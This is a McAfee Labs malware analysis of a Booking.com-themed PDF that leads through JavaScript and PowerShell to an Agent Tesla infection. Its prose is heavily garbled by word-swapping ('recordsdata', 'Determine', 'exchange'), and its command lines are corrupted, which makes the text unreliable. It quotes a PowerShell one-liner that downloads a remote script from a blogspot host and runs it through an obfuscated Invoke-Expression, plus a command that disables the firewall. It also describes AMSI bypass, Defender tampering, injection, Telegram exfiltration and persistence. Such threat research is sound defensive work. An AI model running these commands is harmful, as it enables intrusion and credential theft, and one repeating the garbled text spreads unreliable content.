Rise in Misleading PDF: The Gateway to Malicious Payloads

Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has lately noticed a big surge within the distribution of outstanding malware by means of PDF recordsdata. Malware shouldn’t be solely sourced from doubtful web sites or downloads; sure cases of malware might reside inside apparently innocent emails, significantly throughout the PDF file attachments accompanying them. The following development noticed previously three months by means of McAfee telemetry pertains to the prevalence of malware distributed by means of non-portable executable (non-PE) vectors.

Determine 1: Rise in PDF malware

Why PDF?

Upon implementing Microsoft‘s macro-blocking measures for Web-delivered Workplace recordsdata, risk actors had been compelled to plan various strategies for e-mail malware distribution. The complicated construction of PDF recordsdata renders them inclined to exploitation, posing vital challenges in detecting malicious content material inside. As a generally employed file format distributed by way of e-mail attachments within the shopper area, PDFs signify an attractive avenue for attackers to deceive customers into believing they’re benign. Exploiting this belief, attackers can readily craft PDF-based malware, typically containing payloads hosted on malicious web sites. Upon person interplay, reminiscent of clicking a hyperlink, these PDFs obtain the hosted payload, exacerbating the chance of an infection.

An infection Chain

This rising an infection chain involving, amongst others, Agent Tesla, initiates from an e-mail containing a PDF attachment, which subsequently facilitates the dissemination of the final word payload. Within the outdated and unpatched model of Acrobat Reader, PDFs immediately execute embedded JavaScript utilizing MSHTA, subsequently launching PowerShell, which facilitates course of injection. Conversely, within the newest model of Acrobat Reader, PDFs are unable to execute JavaScript immediately. As a substitute, they redirect to a malicious web site, from which the script is downloaded. The following course of stays in step with the earlier case. The kill chain for the supply of Agent Tesla unfolds as follows:

Determine 2: An infection Chain

Preliminary Entry:

Firstly, we will handle the situation involving the up to date model of Acrobat Reader, as it’s probably that almost all of customers can have this model put in. Usually, these PDF recordsdata are disguised below numerous themes reminiscent of invoices that includes a outstanding obtain button, messages prompting speedy motion, or buttons designed to redirect customers to seemingly benign locations.

In a current assault, a file named “Reserving.com-1728394029.pdf” was used. It’s evidently concentrating on customers below the guise of being affiliated with Reserving.com. It shows a immediate stating, “Lettore non è compatibile!”, which interprets to “Participant shouldn’t be suitable,” as depicted within the supplied Determine under.

Determine 3: Face of PDF attachment

Upon analyzing the inner construction of the PDF (Determine 4), it was found that inside one of many seven objects, some hex knowledge and an embedded URL had been recognized. The URL highlighted within the pink field “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to cover malicious hyperlinks, making them more durable to detect. That is particularly helpful in phishing schemes the place they trick customers into revealing delicate info. Bitly’s dynamic hyperlinks permit attackers to vary locations, enhancing their means to evade detection. Moreover, attackers exploit the belief related to Bitly to enhance the success of their social engineering techniques.

This URL is meant to hook up with https://bio0king[.]blogspot[.]com

Determine 4: Embedded knowledge in PDF

The textual content in yellow highlighted in Determine 4, seems to be in hexadecimal format. Upon changing it to ASCII, the result’s as follows:

Determine 5: ASCII Conversion

That is the explanation behind the immediate noticed in Determine 3, displaying the identical alert message upon opening the PDF doc.

After clicking “OK,” one other immediate appeared from Adobe Participant, cautioning concerning the connection established to the handle talked about within the immediate i.e. “bit.ly”.

Determine 6: Connection to embedded URL

Upon granting permission for redirection, the person is directed to the web site “https://bio0king[.]blogspot[.]com”. Thus, an try is made to disguise itself as a legit Reserving.com web site. As illustrated within the determine under, Microsoft Defender SmartScreen alerts the person to the dangerous nature of this web site. Regardless of the warning, additional evaluation was performed by continuing to the web site to watch subsequent actions.

Determine 7: Connection to disguised web site

Upon accessing the web site, it was noticed {that a} JavaScript file named “Reserving.com-1728394029.js” was promptly downloaded. The js file was deliberately named identically to the PDF file in an effort to deceive customers into opening it.

Determine 8: Immediate of JS file obtain

Instantly upon initiating the obtain, redirection is triggered to the legit Reserving.com web site, aiming to stop customers from detecting any suspicious exercise. The downloaded file is saved within the Downloads folder on the person’s system.

Determine 9: JS file downloaded

The content material of the JavaScript file is closely obfuscated. This tactic is usually employed by attackers to hide their code, thus complicating evaluation efforts and evading detection mechanisms.

Determine 10: JS file content material

Execution:

Upon executing the JavaScript, the next course of tree was noticed:

Determine 11: Course of tree

Command line:

• “C:WindowsSystem32WScript.exe” ” C:UsersadminDownloads Reserving.com-1728394029.js”
  • “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . (‘i*x’).exchange(‘*’,’e’);Begin-Sleep -Seconds 5
    • ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
    • “C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe” /noconfig /fullpaths @”C:UsersadminAppDataLocalTempmk2qsd2s.cmdline”
      • C:WindowsMicrosoft.NETFramework64v4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:UsersadminAppDataLocalTempRES6D2D.tmp” “c:UsersadminAppDataLocalTempCSC7C83DF075A344945AED4D733783D6D80.TMP”
    • “C:Windowssystem32netsh.exe” advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    • “C:WindowsMicrosoft.NETFrameworkv4.0.30319RegSvcs.exe”

Upon decoding and executing “Reserving.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”

Utilizing the PowerShell command line, an try was made to entry the file situated at htloctmain25.blogspot.com/////////////////////////atom.xml, adopted by executing the file utilizing Invoke-Expression (iex). On this occasion, the attackers tried to obfuscate the Invoke-Expression (iex) command through the use of the exchange command throughout the PowerShell command line. As illustrated within the command line, a sleep command was carried out, pausing execution for five seconds. Subsequent phases of the an infection proceeded after this interval.

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is called atom.ps1, measuring roughly 5.5 MB in dimension. The determine under depicts the content material of the file:

Determine 12: Content material of .ps1 file

Let’s start deciphering this script proven in Determine 11 with reference:

The Pink marked content material on the prime of the script signifies that it’ll terminate a number of specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the ultimate payload into one in every of these legit binaries. Moreover, the script creates a listing at “C:ProgramDataMINGALIES” for potential future utilization.

The Blue marked content material throughout the script represents the decryption perform, labeled as “asceeeeeeeeeeeeeeee”. This perform is subsequently employed to decrypt numerous variables throughout the script.

The Inexperienced marked content material in direction of the tip of the script outlines the implementation of the persistence mechanism and describes the injection course of into legit executables.

For reference and ease of comprehension, the variables outlined within the script have been numbered accordingly. The decryption directions for these variables are highlighted in Yellow for readability and emphasis.

Following the sequence of directions, if any of the desired processes are terminated, the script proceeds to outline variables 1 and a pair of. Subsequently, the decryption loop is outlined within the script. After the decryption loop, variable 3, named “Phudigum”, is outlined within the script. Following that, the script decrypts variable 3 and executes the obtained decoded knowledge utilizing the Invoke-Expression (IEX) command.

Protection Evasion:

The content material of the decoded variable 3 is as follows:

Determine 13: Variable 3 after decryption

The code first bypasses the Microsoft Home windows Anti-Malware Scan Interface (AMSI) scanning by setting a particular worth after which proceeds to create registry entries for persistence. The script additionally defines capabilities for interacting with the system’s reminiscence and units world error motion preferences to silently proceed, suppressing any errors. It checks if a sort named AMSIReaper exists and if not, defines this kind with numerous declarations for interacting with the Home windows kernel32.dll, together with capabilities associated to course of reminiscence manipulation.

Moreover, the script executes a collection of malicious actions aimed toward compromising the safety of the system. It begins by including exclusions for particular file extensions, paths, and processes in Home windows Defender, successfully evading detection for these things. Subsequently, it makes an attempt to change numerous Home windows Defender preferences, reminiscent of disabling crucial safety features just like the Intrusion Prevention System, Actual-time Monitoring, and Script Scanning, whereas additionally adjusting settings associated to risk actions and reporting. Moreover, the script tries to switch registry settings related to Person Account Management (UAC) and disable the Home windows Firewall, additional weakening the system’s defenses. Lastly, it resets the worldwide error motion desire to proceed, probably concealing any errors encountered throughout execution and making certain the script’s malicious actions stay undetected. Total, these actions point out a concerted effort to compromise the system’s safety and probably allow additional malicious actions.

Privilege Escalation:

The following instruction in Determine 11 includes decrypting variable 2, labeled as “bulgumchupitum,” using the decryption perform “asceeeeeeeeeeeeeeee.” And the identical is executed by Invoke-Expression (IEX) command. Following is the decoded content material of variable 2:

Determine 14: Variable 2 after decryption

The content material obtained after decrypting variable 2 holds vital significance. The highlighted part in Pink does the next:

• Introduces one other decryption perform particularly tailor-made for this script, named “kimkarden.”
• Moreover, the variable “muthal,” marked as variable 1 in Determine 11, is utilized inside this script reasonably than in the primary .ps1 file.
• Moreover, one other variable is outlined, and its content material is saved within the variable “pinchs.”
• Lastly, the content material of each variables, “muthal” and “pinchs,” is decrypted utilizing the decryption perform “kimkarden” and saved as byte arrays in knowledge 1 and knowledge 2, marked as 5 and 6, respectively, in Determine 13.
• Information 1 and Information 2 are discovered to be .NET executables

The following part marked Blue in Determine 13, does the next:

• After a quick sleep, the script hundreds an meeting utilizing the decoded content material, knowledge 1, and executes a command by means of reflection.
• The script defines a perform named ExecuteCommand, which makes use of reflection to dynamically invoke methodology ‘C’ from a sort named ‘A.B’ loaded from an meeting.
• It defines paths to varied .NET framework executables (RegSvcs.exe for variations 2.0 and 4.0, and Msbuild.exe for model 3.5).
• It invokes the $invokeMethod with the $nullArray and parameters: the trail of .NET framework executables and $data2 (decoded byte array).

Course of Injection:

Determine 15: Information 1

Information 1 contains a .NET DLL file. As beforehand indicated, the script invokes the strategy ‘C’ from the sort named ‘A.B’. Regardless of the excessive degree of obfuscation within the file proven in Determine 15, the presence of methodology ‘C’ could be noticed (highlighted in yellow). Moreover, throughout the script, there’s a particular perform the place the trail to framework executables and knowledge are being handed (highlighted throughout the pink field).

Determine 16: Information 1 dll

This DLL is answerable for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe course of. The next determine reveals the configuration of data2. The depicted configuration of data2 disguises it as a legit McAfee package deal file proven in Determine 16. Nonetheless, it lacks a sound certificates, indicating its fraudulent nature.

Determine 17: Data2

The executable file displays a excessive diploma of obfuscation, rendering its content material largely unreadable. Quite a few strategies are current, every bearing meaningless names, a deliberate tactic employed to impede evaluation by researchers.

Determine 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation course of. Every string undergoes decryption by means of a collection of directions, with particular parameters being handed to acquire the deciphered content material. This meticulous strategy is designed so as to add layers of complexity and hinder easy evaluation. As an example, in Determine 18, by means of reverse engineering, we are able to observe the way it begins querying the browser for info. The highlighted instruction is the one which after decrypting offers the trail of the Opera browser.

Determine 19: Fetching browser info

The next ProcMon logs present all of the broswers the malware queried:

Determine 20: Procmon logs of browsers(1)

Determine 21: Procmons logs for browsers(2)

Credential Entry:

Along with this, it steals delicate info reminiscent of browser historical past, cookies, credentials, SMTP info, session info, and e-mail shopper knowledge reminiscent of Otlook profiles, and so on.

Determine 22: Credentials

Exfiltration:

By debugging the code, we had been in a position to uncover the area it was using for exfiltration. The next determine reveals the URL used for exfiltration:

Determine 23: Area obtained

The identical was evident from Procmon logs proven within the Determine under:

Determine 24: Procmon logs of Connection for exfiltration

The DNS report of IP handle 149.154.167.220 belongs to Telegram messenger.

Determine 25: DNS report

AgentTesla leverages Telegram bots for knowledge exfiltration on account of a number of advantageous components. Firstly, Telegram supplies strong end-to-end encryption, making certain the safety of transmitted knowledge. Secondly, the platform presents anonymity for bot creators, enhancing the stealth of malicious actions. Thirdly, Telegram’s user-friendly interface simplifies communication processes for each attackers and their command-and-control infrastructure. Moreover, since Telegram is a broadly used messaging platform, site visitors to its servers might seem much less suspicious in comparison with different channels, aiding in evading detection. Furthermore, Telegram’s infrastructure resilience makes it a dependable choice for sustaining communication channels even amidst takedown efforts.

Total, the mix of safety, anonymity, ease of use, stealth, and resilience makes Telegram bots an interesting alternative for AgentTesla’s knowledge exfiltration techniques. And to attain this, it establishes contact with the respective area related to the bot and transmits the info, which is then tracked by a particular bot ID.

Determine 26: TelegramBot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving legit .NET executable paths, performing course of injection to execute the malware, accumulating knowledge, and in the end exfiltrating the acquired info.

Persistence:

Shifting ahead with atom.ps1 (Determine 11), the following is variable 4, labeled as “koaskodkwllWWW”, and is decrypted utilizing the perform “asceeeeeeeeeeeeeeee”. Upon decryption, the content material is decoded as follows:

Determine 27: Variable 4 decoded

This script establishes persistence by:

1. Creating an HTA script to execute PowerShell instructions fetched remotely. The script incorporates JavaScript code that makes use of ActiveX objects to execute instructions. Particularly, it creates an occasion of WScript.Shell to run a PowerShell command fetched from a distant location (linkcomsexi).
2. It registers a scheduled job named “Tnamesexi” using Register-ScheduledTask. The duty is ready to set off as soon as at a particular time, calculated by including a sure variety of minutes (mynsexi) to the present time.
3. Lastly, it units a registry worth below the present person’s Run key (HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun). This registry worth, named “Tnamesexi,” is configured to execute the command schtasks /run /tn $taskName, thereby manually triggering the scheduled job established within the previous step.

Finally, the content material highlighted in inexperienced in Determine 11 performs the ultimate job. The directions are as follows:

Determine 28: Persistence directions

Now, after substituting the values:

• “mynsexi” is ready to “213”, indicating that the script can be executed once more after 213 minutes.
• “Tnamesexi” is outlined as “chromeupdateri”, implying {that a} Run entry can be created below this identify.
• “linkcomsexi” is assigned the worth “htljan62024.blogspot.com//////////atom.xml”, suggesting that the atom.ps1 file can be fetched once more from this URL.

We inspected registry entries and scheduled job entries for cross-verification. And the script did as directed:

Determine 29: Registry entry for Persistence

Determine 30: Process Scheduler

Determine 31: Procmon logs for persistence

In abstract, the script is configured to execute once more after 213 minutes, making a Run entry named “chromeupdateri” and fetching the atom.ps1 file once more from “htljan62024.blogspot.com//////////atom.xml”.

Execution with outdated and unpatched model of Acrobat Reader:

Upon opening the PDF within the outdated, unpatched model of Acrobat Reader, a immediate instantly appeared indicating the launch of MSHTA together with the whole JavaScript code contained therein. That is depicted within the determine under.

Determine 32: Immediate for embedded javascript

Upon analyzing the streams of the PDF, we found the similar script embedded throughout the doc:

Determine 33: Embedded javascript in PDF

After the launch of MSHTA, an occasion of PowerShell is invoked, initiating course of injection into Regsvcs.exe and injection of AgentTesla. Consequently, using an outdated and unpatched model of Acrobat Reader, interplay with the PDF is pointless; mere opening of the PDF file ends in system an infection by the malware.

Abstract:

The chain of occasions initiates with the supply of a PDF file containing malicious content material. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, resulting in the obtain and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, within the type of a .NET DLL file, which injects AgentTesla payload into legit processes to evade detection. The malware communicates with command-and-control servers, exfiltrating delicate knowledge by means of Telegram bots for stealthy transmission. To make sure persistence, the malware establishes scheduled duties and registry entries, permitting it to execute periodically and keep its presence on the contaminated system. Within the outdated model of Acrobat Reader, opening the PDF triggered the automated execution of malicious JavaScript, resulting in the injection of AgentTesla malware by way of PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, additional confirming the exploitation of vulnerabilities with out requiring person interplay. This orchestrated sequence underscores the delicate nature of the assault, spanning from preliminary an infection to knowledge exfiltration and chronic infiltration, posing vital challenges for detection and mitigation efforts.

Mitigation:

Avoiding falling sufferer to e-mail phishing includes adopting a vigilant and cautious strategy. Listed below are some frequent practices to assist stop falling prey to e-mail phishing:

• Confirm Sender Data
• Suppose Earlier than Clicking Hyperlinks and Warnings
• Test for Spelling and Grammar Errors
• Be Cautious with Electronic mail Content material
• Confirm Uncommon Requests
• Use Electronic mail Spam Filters
• Test for Safe HTTP Connections
• Delete Suspicious Emails
• Hold Home windows and Safety Software program Updated
• Use the most recent and patched model of Acrobat reader

Indicators of Compromise (IOCs)

Desk 1: Indicators of Compromise

Introducing McAfee+

Identification theft safety and privateness on your digital life

Obtain McAfee+ Now